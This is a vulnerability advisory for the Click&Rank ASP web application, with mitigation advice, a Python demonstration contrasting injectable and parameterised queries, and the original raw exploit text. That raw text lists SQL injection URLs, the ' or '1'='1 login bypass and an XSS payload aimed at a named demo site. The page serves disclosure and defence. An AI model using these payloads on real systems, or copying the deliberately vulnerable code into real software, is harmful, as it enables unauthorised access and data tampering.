Vendor: Click&Rank
By: AlpHaNiX
CVSS: 8.8 (HIGH)
Vulnerability types: SQL Injection, Authentication Bypass, Cross Site Scripting
CWE: 89, 287, 79
Product Name: Click&Rank
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Click&Rank

The Click&Rank application is vulnerable to SQL injection, authentication bypass and cross-site scripting, all reachable by sending crafted input to its ASP pages. The id parameter of hitcounter.asp, user_delete.asp and user_update.asp is placed into SQL queries without sanitisation, so arbitrary SQL can be appended to it. The admin login (admin.asp) builds its credential check the same way: supplying ' or '1'='1 as both username and password turns the WHERE clause into a tautology and logs the attacker in without valid credentials. The action parameter of user.asp is reflected into the page unencoded, so a value such as "><script>alert(1);</script> is executed in the browser of anyone who follows the crafted link.

Mitigation:

Build every database query with bound parameters (an ADODB.Command with parameters in ASP) instead of concatenating request values into SQL strings, and reject non-numeric values for id before they reach the database. The admin login must compare credentials through a parameterised query, and user_delete.asp and user_update.asp should verify an authenticated admin session before acting on a record. HTML-encode reflected parameters such as action (Server.HTMLEncode) before writing them into the response.
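The three issues, as an added example that is not taken from the page or from Click&Rank's own code: a string-concatenated login query and id lookup beside their bound-parameter forms, and an unencoded reflected attribute beside an HTML-encoded one. Python with in-memory SQLite stands in for the ASP page and its database; the admins table, its columns and the attribute sink are assumptions, while the payloads are the ones from the advisory.

```python
import html
import sqlite3

# Added example, not Click&Rank source. The table name and columns are
# assumptions standing in for the application's unpublished schema; the
# payloads are the ones from the advisory (the XSS one URL-decoded).
SQLI_PAYLOAD = "' or '1'='1"
ID_PAYLOAD = "2 OR 1=1"
XSS_PAYLOAD = '"><script>alert(1);</script>'


def build_db():
    """Constructed sample data: an in-memory admins table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO admins (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("editor", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built login check of the kind the advisory's payload implies.

    With ' or '1'='1 in both fields the WHERE clause becomes
    username = '' or '1'='1' AND password = '' or '1'='1', which is always true.
    """
    sql = (
        "SELECT COUNT(*) FROM admins WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_hardened(conn, username, password):
    """Same check with bound parameters: the quotes stay inside the value."""
    sql = "SELECT COUNT(*) FROM admins WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def lookup_vulnerable(conn, id_param):
    """Numeric-context injection like hitcounter.asp?id=(SQL): no quote needed."""
    rows = conn.execute("SELECT username FROM admins WHERE id = " + id_param).fetchall()
    return [r[0] for r in rows]


def lookup_hardened(conn, id_param):
    """Accept only an integer id, then bind it; None signals a rejected request."""
    try:
        record_id = int(id_param)
    except ValueError:
        return None  # '2 OR 1=1' never reaches the database
    rows = conn.execute("SELECT username FROM admins WHERE id = ?", (record_id,)).fetchall()
    return [r[0] for r in rows]


def render_vulnerable(action):
    """Reflects user.asp?action= into an attribute value unencoded (assumed sink)."""
    return '<input type="hidden" name="action" value="' + action + '">'


def render_hardened(action):
    """HTML-encodes the value; html.escape plays the role of ASP's Server.HTMLEncode."""
    return '<input type="hidden" name="action" value="' + html.escape(action, quote=True) + '">'


if __name__ == "__main__":
    db = build_db()
    print("vulnerable login bypassed:", login_vulnerable(db, SQLI_PAYLOAD, SQLI_PAYLOAD))
    print("hardened login bypassed:  ", login_hardened(db, SQLI_PAYLOAD, SQLI_PAYLOAD))
    print("vulnerable id lookup:     ", lookup_vulnerable(db, ID_PAYLOAD))
    print("hardened id lookup:       ", lookup_hardened(db, ID_PAYLOAD))
    print("vulnerable render:        ", render_vulnerable(XSS_PAYLOAD))
    print("hardened render:          ", render_hardened(XSS_PAYLOAD))
```

The id case shows why quoting alone is not a fix: the injection point is numeric, so the payload carries no quote for an escaping routine to catch, and only binding the value (after checking it is an integer) closes it.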

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Click&Rank
#download : null
#Demo     :  http://www.icash.ch/index.html?ClickAndRank/default.asp

###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.icash.ch/index.html?ClickAndRank/hitcounter.asp?id=(SQL)
http://www.icash.ch/index.html?ClickAndRank/user_delete.asp?id=(SQL)
http://www.icash.ch/index.html?ClickAndRank/user_update.asp?id=(SQL)

##########################################################################

--=[AUTH BYPASS]=--

http://www.icash.ch/index.html?ClickAndRank/admin.asp

USERNAME  : ' or '1'='1
PASSWORD : ' or '1'='1


##########################################################################

--=[Cross Site Scripting]=--

http://www.icash.ch/index.html?ClickAndRank/user.asp?action=%22%3E%3Cscript%3Ealert(1);%3C/script%3E



#Greetz For My Best Friend ZIGMA

###########################################################################

# milw0rm.com [2008-12-15]